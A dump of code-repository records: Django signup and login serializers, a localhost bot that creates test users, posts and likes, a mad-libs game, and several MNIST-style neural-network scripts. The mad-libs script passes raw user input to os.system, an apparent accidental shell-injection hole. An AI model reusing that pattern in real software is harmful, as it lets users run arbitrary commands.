"text": "import time\nfrom django.contrib.auth.models import User\nfrom django.db.models import Q\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.response import Response\nfrom rest_framework.serializers import (\n CharField,\n EmailField,\n ModelSerializer,\n ValidationError\n)\nfrom rest_framework.status import HTTP_201_CREATED\n\n\nclass UserSignupSerializer(ModelSerializer):\n class Meta:\n model = User\n fields = (\n 'email',\n 'username',\n 'password'\n )\n extra_kwargs = {\n 'password':\n {'write_only': True}\n }\n\n def create(self, validated_data, verify=None, person_info=None):\n \"\"\"\n If need to verify email address pass verify parameter as True.\n \"\"\"\n # Avoid circular dependencies\n from accounts.views import (\n get_additional_data_about_user,\n verify_existence_email\n )\n\n username = validated_data['username']\n email = validated_data['email']\n\n if verify:\n if verify_existence_email(email):\n pass\n else:\n raise ValidationError('Email address not verifying.')\n\n if person_info:\n user_information = get_additional_data_about_user(email)\n if user_information is False:\n pass\n else:\n # TODO\n # Save additional information abou user\n pass\n\n # Checkin\n password = validated_data['password']\n user_obj = User(\n username = username,\n email = email\n )\n user_obj.set_password(password)\n user_obj.save()\n token = Token.objects.create(user=user_obj)\n return validated_data\n\n\nclass UserLoginSerializer(ModelSerializer):\n username = CharField(required=False, allow_blank=True)\n\n class Meta:\n model = User\n fields = (\n 'username',\n 'password',\n )\n extra_kwargs = {\n 'password':\n {'write_only': True}\n }\n\n def validate(self, data):\n user_obj = None\n username = data.get('username', None)\n password = data['password']\n if not username:\n raise ValidationError(\"A username and email is required to login.\")\n user = User.objects.filter(Q(username=username)).distinct()\n if user.exists() and user.count() == 1:\n user_obj = user.first()\n else:\n raise ValidationError(\"This user or email is not valid.\")\n if user_obj:\n if not user_obj.check_password(password):\n raise ValidationError(\"Incorrect credentials, please try again.\")\n user_id = user_obj.id\n return data\n"
},
{
"alpha_fraction": 0.5680047869682312,
"alphanum_fraction": 0.5763930678367615,
"avg_line_length": 31.096153259277344,
"blob_id": "3e6cb1ae74723bc81249450cf280b0f332bf2a75",
"content_id": "0e2ef54960a9ec59f09a13e14bccdd7c6f82cc94",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3338,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 104,
"path": "/bot/automated_bot.py",
"repo_name": "maksymkv25/starnavi",
"src_encoding": "UTF-8",
"text": "import string\nimport random\nimport requests\nfrom config import (\n number_of_users,\n max_posts_per_user,\n max_like_per_user\n)\n\nurl = 'http://127.0.0.1:8000/api/'\nemail_domain = 'gmail.com'\n\nclass GenerateUserData:\n \"\"\"\n Generating user data for bot application.\n \"\"\"\n\n def generate_chars(self, start, stop):\n random_chars = ''.join(random.sample(string.ascii_letters,\n random.randint(start, stop)))\n return random_chars\n\n def generate_email(self):\n user_email = '%s@%s' % (self.generate_chars(4, 12), email_domain)\n return user_email\n\n def generate_username(self):\n username = self.generate_chars(4, 10)\n return username\n\n def _generate_password(self):\n password = self.generate_chars(8, 10)\n return password\n\n def generate_post_text(self):\n text = ''.join([random.choice(string.printable) for _ in range(500)])\n return text\n\n\nclass Bot:\n \"\"\"\n Automated bot for user registration, post creation and post liked.\n \"\"\"\n\n def __init__(self, number_of_users, max_posts_per_user, max_like_per_user):\n self.users_count = number_of_users\n self.max_posts = max_posts_per_user\n self.max_likes = max_like_per_user\n\n def user_signup(self):\n url_method = url + 'user/signup/'\n _password = GenerateUserData()._generate_password()\n data = {\n 'email': GenerateUserData().generate_email(),\n 'username': GenerateUserData().generate_username(),\n 'password': _password\n }\n resp = requests.post(url=url_method, data=data)\n return resp.json().get('username'), _password\n\n\n def user_login(self, username, _password):\n url_method = url + 'user/login/'\n data = {\n 'username': username,\n 'password': _password\n }\n resp = requests.post(url=url_method, data=data)\n _token = resp.json().get('token')\n return _token\n\n def create_post(self, _token):\n url_method = url + 'post/create/'\n data = {'text': GenerateUserData().generate_post_text()}\n headers = {'Authorization': 'Token %s' % _token}\n resp = requests.post(url=url_method, data=data, headers=headers)\n post_id = resp.json().get('id')\n return post_id\n\n def liked_post(self, _token, post_id):\n url_method = url + 'post/%d/like' % post_id\n headers = {'Authorization': 'Token %s' % _token}\n resp = requests.get(url=url_method, headers=headers)\n\n def start_bot(self):\n\n for _ in range(self.users_count):\n username, _password = self.user_signup()\n _token = self.user_login(username, _password)\n count_of_posts = random.randint(1, self.max_posts)\n count_of_likes = random.randint(1, self.max_likes)\n all_posts = []\n while count_of_posts != 0:\n post_id = self.create_post(_token)\n all_posts.append(post_id)\n count_of_posts -= 1\n while count_of_likes != 0:\n random_post = random.choice(all_posts)\n self.liked_post(_token, random_post)\n count_of_likes -= 1\n\n\nif __name__ == \"__main__\":\n Bot(number_of_users, max_posts_per_user, max_like_per_user).start_bot()\n"
}
] | 10 |
laurelr2020/mad-libs-generator | https://github.com/laurelr2020/mad-libs-generator | 3d1f393fd066deadccb704641a9d48a1bb621bd8 | dd264451870d6392c6851fcdbc852b7174c11348 | 6a46aa962d5001846ad5167ba6488677f6863e97 | refs/heads/master | 2020-07-09T05:03:20.839438 | 2019-08-25T02:56:04 | 2019-08-25T02:56:04 | 203,886,525 | 0 | 0 | null | 2019-08-22T23:09:23 | 2019-08-23T01:38:19 | 2019-08-25T02:56:04 | Python | [
{
"alpha_fraction": 0.6403647661209106,
"alphanum_fraction": 0.6582077741622925,
"avg_line_length": 39.67741775512695,
"blob_id": "f0275492d1932bd3138266ff88ac332d27862706",
"content_id": "dcadeac6109264c07cae0431efc53dc81444b309",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2522,
"license_type": "no_license",
"max_line_length": 329,
"num_lines": 62,
"path": "/mad-libs.py",
"repo_name": "laurelr2020/mad-libs-generator",
"src_encoding": "UTF-8",
"text": "from os import system\ndef promptBeginning():\n answer = input(\"Would you like to do a Mad Lib? (yes/no) \")\n\n if answer == \"yes\":\n generateMadLib()\n elif answer == \"no\":\n print(\"okay...byee\")\n else:\n print(\"not a valid input\")\n\ndef generateMadLib():\n print(\"\\n******* Welcome ********\")\n print(\"You will be prompted for different types of words from the English language.\")\n print(\"Enter a word for each prompt and at then end you will have a story.\")\n print(\"\\n\")\n\n sillyName = input(\"Silly Name: \")\n unrealisticProfession = input(\"Unrealistic Profession: \")\n country = input(\"Country: \")\n sillyName2 = input(\"Another Silly Name: \")\n color = input(\"Color: \")\n adjective = input(\"Adjective: \")\n adverb = input(\"Adverb: \")\n sillyName3 = input(\"Third Silly Name: \")\n sillyName4 = input(\"Fourth Silly Name: \")\n facialFeature = input(\"Facial Feature: \")\n city = input(\"US City: \")\n sillyName5 = input(\"Fifth Silly Name: \")\n verb = input(\"Verb ending in -ing: \")\n noun = input(\"Noun: \")\n actor = input(\"Actor: \")\n noun2 = input(\"Noun: \")\n\n madLibList = [sillyName, unrealisticProfession, country, sillyName2, color, adjective, adverb, sillyName3, sillyName4, facialFeature, city, sillyName5, verb, noun, actor, noun2]\n populateMadLib(madLibList)\n\ndef populateMadLib(inputs):\n madLib0 = \"Meet our hero {}, a super intelligent {}.\".format(inputs[0], inputs[1])\n printAndSpeak(madLib0)\n\n madLib1 = \"A run-in with the military of {} leads him to create his alter-ego, {}, a {}, {} giant, capable of great destruction.\".format(inputs[2], inputs[3], inputs[4], inputs[5])\n printAndSpeak(madLib1)\n\n madLib2 = \"He {} battles the military with his girlfriend {}.\".format(inputs[6], inputs[7])\n printAndSpeak(madLib2)\n\n madLib3 = \"Eventually it is discovered that long-time colleague of our hero, {}, distinguished by his {}, is trying to turn {} into a weapon, leading to a climatic, if pointless, battle in downtown {} with an evil version of the same giant alter-ego called {}.\".format(inputs[8], inputs[9], inputs[3], inputs[10], inputs[11])\n printAndSpeak(madLib3)\n\n madLib4 = \"Eventually the enemy is subdued by {} him with a {}.\".format(inputs[12], inputs[13])\n printAndSpeak(madLib4)\n\n madLib5 = \"In the final reel, {} joins him in a {}.\".format(inputs[14], inputs[15])\n printAndSpeak(madLib5)\n\n\ndef printAndSpeak(sentence):\n print(sentence)\n system(\"say \" + sentence)\n\npromptBeginning()\n"
}
] | 1 |
ksmaybe/Project-2-Handwiriting-Neural-Network | https://github.com/ksmaybe/Project-2-Handwiriting-Neural-Network | ac9f5ee726949f840d5c85e330c622b09aac6667 | 4628e3846ff7d0fa7c63d5409eeae15a0bbc41f4 | fdf86b5edfccb4efffec83023229c5b2e526b21e | refs/heads/master | 2020-04-09T20:49:09.732185 | 2019-01-17T13:39:43 | 2019-01-17T13:39:43 | 160,585,052 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5253061652183533,
"alphanum_fraction": 0.5394717454910278,
"avg_line_length": 23.02836799621582,
"blob_id": "a35cbc6f046d597220dfecc346253a949429e31e",
"content_id": "ed363715fb245fcc648ffdcb179a77032fb81460",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6777,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 282,
"path": "/neural network.py",
"repo_name": "ksmaybe/Project-2-Handwiriting-Neural-Network",
"src_encoding": "UTF-8",
"text": "import struct\n\nimport numpy as np\nimport cv2\nimport math\nimport os\nfrom numba import vectorize\n\nnp.random.seed(0)\ndef sigmoid(x):\n return 1/(1+np.exp(-x))\n\ndef sigmoid_derivative(x):\n return x*(1-x)\n\nclass Connection:\n def __init__(self, con_neuron):\n self.con_neuron=con_neuron\n self.weight=np.random.normal()\n self.d_weight = 0.0\n\n\nclass Neuron:\n E=0.001\n A=0.01\n\n def __init__(self,layer):\n self.connectors=[]\n self.error=0.0\n self.gradient=0.0\n self.output=0.0\n if layer is None:\n pass\n else:\n for neuron in layer:\n con=Connection(neuron)\n self.connectors.append(con)\n\n def add_error(self,error):\n self.error+=error\n\n def set_error(self,error):\n self.error=error\n\n def set_output(self,output):\n self.output=output\n\n def get_output(self):\n return self.output\n\n def feed_forward(self):\n sum=0\n if len(self.connectors)!=0:\n x=[None]*len(self.connectors)\n y=[None]*len(self.connectors)\n i=0\n for con in self.connectors:\n x[i]=con.con_neuron.output\n y[i]=con.weight\n\n i+=1\n x=np.array(x)\n y=np.array(y)\n sum=np.dot(x,y)\n self.output=sigmoid(sum)\n xx=0\n else:\n self.output=0.5\n\n\n def back_propagate(self):\n self.gradient=self.error*sigmoid_derivative(self.output)\n l=len(self.connectors)\n x=[None]*l\n y=[None]*l\n z=[None]*l\n w=[None]*l\n cons=self.connectors\n for con in self.connectors:\n # x[i]=con[i].con_neuron.output\n # y[i]=con[i].d_weight\n # z[i]=con[i].con_neuron.error\n # w[i]=con[i].weight\n # x=np.array(x)\n # y=np.array(y)\n # z=np.array(z)\n # w=np.array(w)\n # for i in range(l):\n # y[i]=self.E*(x[i]*self.gradient)+self.A*y[i]\n # w[i]=w[i]+y[i]\n # z[i]=z[i]+(w[i]*self.gradient)\n\n\n # aa=self.E*x*self.gradient\n # bb=self.A*y\n # y=aa+bb\n # w=w+y\n # z=z+(w*self.gradient)\n con.d_weight=self.E*(con.con_neuron.output*self.gradient)+self.A*con.d_weight\n con.weight+=con.d_weight\n con.con_neuron.add_error(con.weight*self.gradient)\n\n\n self.error=0\n\nclass N_Network:\n def __init__(self,set):\n self.layer_list=[]\n for n in set:\n layer=[]\n for i in range(n):\n if len(self.layer_list)==0:\n layer.append(Neuron(None))\n else:\n layer.append(Neuron(self.layer_list[-1]))\n layer.append(Neuron(None))\n last_neuron=layer[-1]\n last_neuron.set_output(1)\n self.layer_list.append(layer)\n\n def set_input(self,input_list):\n for i in range(len(input_list)):\n self.layer_list[0][i].set_output(input_list[i])\n\n def get_error(self,y):\n error=0\n zz=[None]*len(y)\n for i in range(len(y)):\n\n zz[i]=(y[i]-self.layer_list[-1][i].output)\n #error+=err**2\n zz=np.array(zz)\n k=np.power(zz,2)\n k=np.divide(k,len(y))\n k=np.sum(k)\n error=np.sqrt(k)\n # error/=len(y)\n # error=math.sqrt(error)\n return error\n\n def feed_forward(self):\n for layer in self.layer_list[1:]:\n for n in layer:\n n.feed_forward()\n\n def back_propagate(self,prev):\n kk=[None]*len(prev)\n gg=[None]*len(prev)\n for i in range(len(prev)):\n kk[i]=prev[i]\n gg[i]=self.layer_list[-1][i].output\n\n #self.layer_list[-1][i].set_error(prev[i]-self.layer_list[-1][i].output)\n kk=np.array(kk)\n gg=np.array(gg)\n for i in range(len(prev)):\n self.layer_list[-1][i].error=kk[i]-gg[i]\n for layer in self.layer_list[::-1]:\n for n in layer:\n n.back_propagate()\n\n def get_results(self):\n output=[]\n for n in self.layer_list[-1]:\n out=n.output\n # if out>0.5:\n # out=1\n # else:\n # out=0\n output.append(out)\n output.pop() #remove bias neuron\n return output\n\ntrain_image=\"train_images.raw\"\n\ndef byteToPixel(file,width,length):\n 
stringcode='>'+'B'*len(file)\n x=struct.unpack(stringcode,file)\n\n data=np.array(x)\n\n data=data.reshape(int(len(file)/(width*length)),width*length,1)/255\n return data\n\nff=open(train_image,'rb')\nbytefile=ff.read()\ntrain_lst=byteToPixel(bytefile,28,28)\n\n\n# #read train image to integer values\n\n# train_lst=[]\n# p=\"train_img/\"\n# x=os.listdir(\"train_img\")\n# no_of_train=10 #len(x)\n# for i in range(no_of_train):\n# image=cv2.imread(p+x[i],0)\n# img=cv2.bitwise_not(image)\n# img1=[]\n# for c in img:\n# img1.extend(c)\n# train_lst.append(img1)\n\n#read training labels\nf=open(\"train_labels.txt\",'r')\nread_lines_train=f.readlines()\ntrain_label=[]\nfor line in read_lines_train:\n mlst=[]\n for c in line:\n if c.isnumeric():\n mlst.append(int(c))\n train_label.append(mlst)\ntrain_label=train_label #[:no_of_train]\n\n#read test image to integer values\n\ntest_image=\"test_images.raw\"\n\n\nfg=open(test_image,'rb')\nbytefile1=fg.read()\ntest_lst=byteToPixel(bytefile1,28,28)\nno_of_test=len(test_lst)\n\n# test_lst=[]\n# p=\"train_img/\"\n# k=os.listdir(\"train_img\")\n#no_of_test=len(k)\n# for i in range(no_of_test):\n# image=cv2.imread(p+k[i],0)\n# img=cv2.bitwise_not(image)\n# img1=[]\n# for c in img:\n# img1.extend(c)\n# test_lst.append(img1)\n\n#read test labels\ng=open(\"test_labels.txt\",'r')\nread_lines_test=g.readlines()\ntest_label=[]\nfor line in read_lines_test:\n mlst=[]\n for c in line:\n if c.isnumeric():\n mlst.append(int(c))\n test_label.append(mlst)\ntest_label=test_label #[:no_of_test]\n\n\n\n#begin neural network\nset=[]\nset.append(28*28)\nset.append(50)\nset.append(5)\nnet=N_Network(set)\nNeuron.E=0.09\nNeuron.A=0.015\ninputs=train_lst\noutputs=train_label\nwhile True:\n err=0\n zz=1\n for i in range(len(inputs)):\n net.set_input(inputs[i][0])\n net.feed_forward()\n net.back_propagate(outputs[i])\n err=net.get_error(outputs[i])\n print(zz,\"output train: \",net.get_results())\n print(\"train_label: \", train_label[i])\n zz+=1\n break\n print(\"total err: \",err)\n if err<0.1:\n break\nfor z in range(no_of_test):\n k=test_lst[z]\n net.set_input(k)\n net.feed_forward()\n print(\"Results: \",net.get_results())\n print(\"Label: \",test_label[z])\n\n"
},
{
"alpha_fraction": 0.5972095131874084,
"alphanum_fraction": 0.6177950501441956,
"avg_line_length": 23.700565338134766,
"blob_id": "06689c690a1f1726c9fce9c2c00c5a16d72b663d",
"content_id": "3c741f5cb4bd1c8070a8461a2f9487d96af84d9c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4372,
"license_type": "no_license",
"max_line_length": 140,
"num_lines": 177,
"path": "/neural network finally working.py",
"repo_name": "ksmaybe/Project-2-Handwiriting-Neural-Network",
"src_encoding": "UTF-8",
"text": "import struct\n\nimport mnist as mnist\nimport numpy as np\nfrom numba import vectorize\nimport mnist\n\nlr=0.5 #learning rate\n\n#sigmoid function/activation\ndef sigmoid(x):\n return 1/(1+np.exp(-x))\n#sigmoid prime\ndef sigmoid_derivative(x):\n return x*(1-x)\n\nbias =1\n\nclass Neural_NetWork(object):\n def __init__(self):\n #parameters\n self.input_size=784\n self.hidden_size=300\n self.output_size=5\n self.old_error=99999 #sum of error\n self.new_error=0\n self.o_error=999\n\n #The weight matrixes\n self.Weight_1=np.random.uniform(-2,2,(self.input_size,self.hidden_size))\n self.Weight_2=np.random.uniform(-2,2,(self.hidden_size,self.output_size))\n\n\n def feed_forward(self,X):\n\n self.z=np.dot(X,self.Weight_1)+bias #sum of Weight and output\n self.z2=sigmoid(self.z) #hidden layer activation\n self.z3=np.dot(self.z2,self.Weight_2)+bias\n o=sigmoid(self.z3) #output layer activation\n return o\n\n def back_propagation(self,X,y,o):\n self.o_error=np.sum((y-o)**2)/2 #get sum of error/ accuracy check\n\n #get Err\n self.d_Et_Ot=-(y - o)\n self.d_o_net=sigmoid_derivative(o).reshape((1,5))\n self.d_net_w=self.z2.repeat(5).reshape(self.hidden_size,5)*(self.Weight_2**0)\n\n #get dError/dWeight for output layer\n xx= self.d_Et_Ot * self.d_o_net\n self.d_error_w= xx*self.d_net_w\n self.Weight_2-=lr*self.d_error_w\n\n #get dError/dWeight for hidden layer\n self.d_Eo_No=self.d_Et_Ot*self.d_o_net\n self.d_No_Oh=self.Weight_2\n\n self.d_Eo_Oh=self.d_Eo_No*self.d_No_Oh\n self.d_Et_Oh=np.sum(self.d_Eo_Oh,axis=1)\n\n self.d_Oh_Nh=sigmoid_derivative(self.z2)\n yy=self.d_Et_Oh*self.d_Oh_Nh\n self.d_Et_w=X.repeat(self.hidden_size).reshape(784,self.hidden_size)*yy.reshape((1,self.hidden_size))\n self.Weight_1-=lr*self.d_Et_w\n\n\n def train(self,X,y): #forward and back once/train once\n o=self.feed_forward(X)\n self.back_propagation(X,y,o)\n\n\ntrain_image=\"train_images.raw\"\n\n#turn raw file to np array\ndef byteToPixel(file,width,length):\n stringcode='>'+'B'*len(file)\n x=struct.unpack(stringcode,file)\n\n data=np.array(x)\n\n data=data.reshape(int(len(file)/(width*length)),width*length)/255\n\n return data\n\nff=open(train_image,'rb') #read raw\nbytefile=ff.read()\ntrain_lst=byteToPixel(bytefile,28,28)\n\n\n\n#read training labels\nf=open(\"train_labels.txt\",'r')\nread_lines_train=f.readlines()\ntrain_label=[]\nfor line in read_lines_train:\n mlst=[]\n for c in line:\n if c.isnumeric():\n mlst.append(int(c))\n train_label.append(mlst)\ntrain_label=np.array(train_label) #[:no_of_train]\n\n#read test image to integer values\n\ntest_image=\"test_images.raw\"\n\nfg=open(test_image,'rb')\nbytefile1=fg.read()\ntest_lst=byteToPixel(bytefile1,28,28)\nno_of_test=len(test_lst)\n\n\ng=open(\"test_labels.txt\",'r')\nread_lines_test=g.readlines()\ntest_label=[]\nfor line in read_lines_test:\n mlst=[]\n for c in line:\n if c.isnumeric():\n mlst.append(int(c))\n test_label.append(mlst)\ntest_label=np.array(test_label) #[:no_of_test]\n\n\nX=train_lst\ny=train_label\n\n#start of training\nnet=Neural_NetWork()\nlstp=[]\nfor e in range(100):\n print(\"e:\",e)\n for i in range(len(train_lst)):\n X=train_lst[i]\n y=train_label[i]\n o=net.feed_forward(X)\n net.train(X,y)\n net.new_error+=net.o_error\n lstp.append(net.new_error)\n print(net.new_error)\n if net.old_error-net.new_error<5 and e>10 and net.new_error<1000: #after 10 epoches and change in sum of error between epoch very small\n break\n net.old_error=net.new_error\n net.new_error=0\n\n#draw confusion 
matrix\nconfusion_matrix=np.array([0]*25).reshape(5,5)\nsuccess=0\nfor i in range(len(test_label)):\n\n o=net.feed_forward(test_lst[i])\n x=0\n y=0\n for j in range(5):\n if test_label[i][j]==1:\n x=j\n break\n\n for j in range(len(o)):\n if max(o)==o[j]:\n y=j\n break\n confusion_matrix[x][y]+=1\n if x==y:\n success+=1\n\n\n\n\n\nprint()\nprint(\"confusion matrix\")\nprint(confusion_matrix)\nprint()\nprint(\"success: \",success,'/',len(test_label))\nprint(\"success rate: \",float(success/len(test_label)))\n"
},
{
"alpha_fraction": 0.5402542352676392,
"alphanum_fraction": 0.5583590269088745,
"avg_line_length": 24.426469802856445,
"blob_id": "4a46240be1a69b82ed52832be2cf5f43806d5c86",
"content_id": "aedb8ce645a6caf3ee224dd7d347cec96a73e7ee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5192,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 204,
"path": "/neural net.py",
"repo_name": "ksmaybe/Project-2-Handwiriting-Neural-Network",
"src_encoding": "UTF-8",
"text": "import struct\nimport numpy as np\nimport cv2\nimport os\n\nnp.random.seed(0)\nweights=np.random.rand(28*28)\nbias=np.random.rand(1)\nlr=0.1 #learning rate\nclass NeuralNetwork:\n def __init__(self,hidden,output):\n self.error=0\n self.input=input\n #[weight,d_change]\n self.h=hidden\n self.hidden=[[None,None] for zz in range(hidden)]\n self.h_out=np.array([None]*self.h)\n\n self.o=output\n self.output=[[None,None] for zz in range(output)]\n self.o_out=np.array([None]*self.o)\n d_weight1=np.array([None]*self.h)\n self.h_dw=d_weight1\n d_weight2=np.array([None]*self.o)\n self.o_dw=d_weight2\n d_total1=np.array([None]*self.h)\n self.h_dt=d_total1\n d_total2=np.array([None]*self.o)\n self.o_dt=d_total2\n\n\n\n\ndef sigmoid(x):\n return 1/(1+np.exp(-x))\n\ndef sigmoid_derivative(x):\n return x*(1-x)\n\ntrain_image=\"train_images.raw\"\n\ndef byteToPixel(file,width,length):\n stringcode='>'+'B'*len(file)\n x=struct.unpack(stringcode,file)\n\n data=np.array(x)\n\n data=data.reshape(int(len(file)/(width*length)),width*length)/255\n\n return data\n\nff=open(train_image,'rb')\nbytefile=ff.read()\ntrain_lst=byteToPixel(bytefile,28,28)\n\n# #read train image to integer values\n\n# train_lst=[]\n# p=\"train_img/\"\n# x=os.listdir(\"train_img\")\n# no_of_train=10 #len(x)\n# for i in range(no_of_train):\n# image=cv2.imread(p+x[i],0)\n# img=cv2.bitwise_not(image)\n# img1=[]\n# for c in img:\n# img1.extend(c)\n# train_lst.append(img1)\n\n#read training labels\nf=open(\"train_labels.txt\",'r')\nread_lines_train=f.readlines()\ntrain_label=[]\nfor line in read_lines_train:\n mlst=[]\n for c in line:\n if c.isnumeric():\n mlst.append(int(c))\n train_label.append(mlst)\ntrain_label=np.array(train_label) #[:no_of_train]\n\n#read test image to integer values\n\ntest_image=\"test_images.raw\"\n\n\nfg=open(test_image,'rb')\nbytefile1=fg.read()\ntest_lst=byteToPixel(bytefile1,28,28)\nno_of_test=len(test_lst)\n\n# test_lst=[]\n# p=\"train_img/\"\n# k=os.listdir(\"train_img\")\n#no_of_test=len(k)\n# for i in range(no_of_test):\n# image=cv2.imread(p+k[i],0)\n# img=cv2.bitwise_not(image)\n# img1=[]\n# for c in img:\n# img1.extend(c)\n# test_lst.append(img1)\n\n#read test labels\ng=open(\"test_labels.txt\",'r')\nread_lines_test=g.readlines()\ntest_label=[]\nfor line in read_lines_test:\n mlst=[]\n for c in line:\n if c.isnumeric():\n mlst.append(int(c))\n test_label.append(mlst)\ntest_label=np.array(test_label) #[:no_of_test]\n\nnet=NeuralNetwork(30,5)\nfor i in range(net.h):\n weight=np.array(np.random.rand(28*28))\n net.hidden[i][0]=weight\n net.hidden[i][1]=np.array([None]*28*28)\n\nfor i in range(net.o):\n weight=np.array(np.random.rand(net.h))\n net.output[i][0]=weight\n net.output[i][1]=np.array([None]*net.h)\n\ntrain_no=len(train_lst)\nfor epoch in range(1):\n for i in range(train_no):\n net.input=train_lst[i]\n for j in range(net.h):\n XW=np.dot(net.input,net.hidden[j][0])+bias\n z=sigmoid(XW)\n net.h_out[j]=z\n #print('h',XW)\n\n for k in range(net.o):\n XW=np.dot(net.h_out,net.output[k][0])+bias\n z=sigmoid(XW)\n net.o_out[k]=z\n\n #print('o',XW)\n error=net.o_out-train_label[i]\n print(error)\n err=[None]*5\n for ii in range(5):\n err[ii]=error[ii]**2\n MSE=np.divide(np.sum(err),2)\n net.error+=MSE\n print(MSE)\n print(\"total error: \",net.error)\n print(net.o_out)\n print(\"image: \",i+1)\n for pp in range(5):\n\n net.o_dw[pp]=sigmoid_derivative(net.o_out[pp])\n net.o_dt[pp]=-(train_label[i][pp]-net.o_out[pp])\n\n net.output[pp][1]=net.o_dw[pp]*net.o_dt[pp]*net.h_out\n 
net.output[pp][0]=np.subtract(net.output[pp][0],net.output[pp][1])\n\n\n for ll in range(net.h):\n net.h_dw[ll]=sigmoid_derivative(net.h_out[ll])\n zzz=0\n for llp in range(net.o):\n zzz+=net.output[llp][0][ll]\n print(zzz,\"haha\")\n zz=np.sum(net.o_dw*zzz)\n #net.o_dt[llp]*net.o_dw[llp]*net.output[llp][0][ll]\n net.h_dt[ll]=zz*net.o_dt\n # for lll in range(28*28):\n # z=net.input[lll]\n #net.hidden[ll][1][lll]=net.h_dw[ll]*net.h_dt[ll]*z\n\n print(net.h_dw[ll], net.h_dt[ll])\n\n net.hidden[ll][1]=net.input#*zzzz\n\n net.hidden[ll][0]=np.subtract(net.hidden[ll][0],net.hidden[ll][1])\n print(\"dw\")\n print(net.h_dw)\n print(net.o_dw)\n print(\"else\")\n\n # error= z-train_label[i]\n # print(\"image: \",i+1)\n # print(\"epoch: \",epoch+1)\n # print(\"error sum: \",error.sum())\n #\n #\n # dcost_dpred=error\n # dpred_dz=sigmoid_derivative(z)\n #\n # z_delta=dcost_dpred*dpred_dz\n #\n # inputs=train_lst[i].T\n # weights-=lr*np.dot(inputs,z_delta)\n #\n # for num in z_delta:\n # bias-=lr*num\n print(\"epoch: \",epoch+1)\n if net.error<0.01:\n break\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.5967742204666138,
"alphanum_fraction": 0.6404569745063782,
"avg_line_length": 21.560606002807617,
"blob_id": "d01fff5eb77c528dc23d8f422ebbbfe7289f9781",
"content_id": "6699b8240082bdcfdb367bffc606e73223182c62",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1488,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 66,
"path": "/test.py",
"repo_name": "ksmaybe/Project-2-Handwiriting-Neural-Network",
"src_encoding": "UTF-8",
"text": "import struct\n\n\nimport random\n\nimport gzip\nimport cv2\nimport os\nimport copy\nimport numpy as np\n\n\n#\n# f = gzip.open('train-labels-idx1-ubyte.gz','r')\n# train_labeler=np.array([])\n#\n# for i in range(1):\n# buf = f.read(8)\n# labels = np.frombuffer(buf, dtype=np.uint8).astype(np.int64)\n# print(labels)\n# for i in range(60000):\n# buf = f.read(1)\n# labels = np.frombuffer(buf, dtype=np.uint8).astype(np.int64)\n# train_labeler=np.append(train_labeler,labels)\n# train_label=[]\n# for j in range(len(train_labeler)):\n# x=[0]*10\n# x[int(train_labeler[j])]=1\n# train_label.append(x)\n# print(len(train_label))\n\n\nf = gzip.open('train-images-idx3-ubyte.gz','r')\ntrain_lst=np.array([])\n\nfor i in range(2):\n buf = f.read(8)\n labels = np.frombuffer(buf, dtype=np.uint8).astype(np.int64)\n print(labels)\nkk=0\nkkk=0\nbuf = f.read(28*28*60001)\nlabels = np.frombuffer(buf, dtype=np.uint8).astype(np.int64)\ntrain_lst=np.append(train_lst,labels)\nprint(train_lst,'train_lst')\nfor j in range(len(train_lst)):\n if train_lst[j]>0:\n kk+=1\n if train_lst[j]>kkk:\n kkk=train_lst[j]\n\nprint(kk)\nprint(kkk)\ntrain_lst=train_lst.reshape(int(len(train_lst)/(28*28)),28*28)/255\nprint(len(train_lst))\n\n\n\n# for i in range(2):\n# buf = f.read(8)\n# labels = np.frombuffer(buf, dtype=np.uint8).astype(np.int64)\n# print(labels)\n# for i in range(28):\n# buf = f.read(28)\n# labels = np.frombuffer(buf, dtype=np.uint8).astype(np.int64)\n# print(labels)"
},
{
"alpha_fraction": 0.4117647111415863,
"alphanum_fraction": 0.5882353186607361,
"avg_line_length": 8,
"blob_id": "bbe3dbc37291e19d92df1e9d22af8e623b427a49",
"content_id": "e1c1ee3be27d904d5aeff35972757ed9655cac41",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 17,
"license_type": "no_license",
"max_line_length": 8,
"num_lines": 2,
"path": "/testing.py",
"repo_name": "ksmaybe/Project-2-Handwiriting-Neural-Network",
"src_encoding": "UTF-8",
"text": "x=[0]*10\nprint(x)"
},
{
"alpha_fraction": 0.8529411554336548,
"alphanum_fraction": 0.8823529481887817,
"avg_line_length": 33,
"blob_id": "21ad9aa02a064b0293938fd3cbe9427d7ad41064",
"content_id": "54b99efce0de02c0f00c9c3227884f686d7259de",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 34,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 1,
"path": "/README.md",
"repo_name": "ksmaybe/Project-2-Handwiriting-Neural-Network",
"src_encoding": "UTF-8",
"text": "Project 2 Handwriting Recognition\n"
}
] | 6 |
ZenIsBestWolf/toolbox | https://github.com/ZenIsBestWolf/toolbox | 7c39f450a1c000108f7da2758add6ee13bbe5902 | a1baae0e9a34c952b3c8abb4f6591dee12f1c4bb | 0f76e218b6a044dab223822825fe3b28c097fdc5 | refs/heads/master | 2023-03-09T10:39:02.835294 | 2021-03-03T18:22:33 | 2021-03-03T18:22:33 | 286,537,588 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5522642135620117,
"alphanum_fraction": 0.5734229683876038,
"avg_line_length": 35.32902145385742,
"blob_id": "030b5439d6892eb7e2b06dcd716cf28012358d7b",
"content_id": "ea429d0278c98a9e184a0a2e1289929945a08fba",
"detected_licenses": [
"MIT",
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 25285,
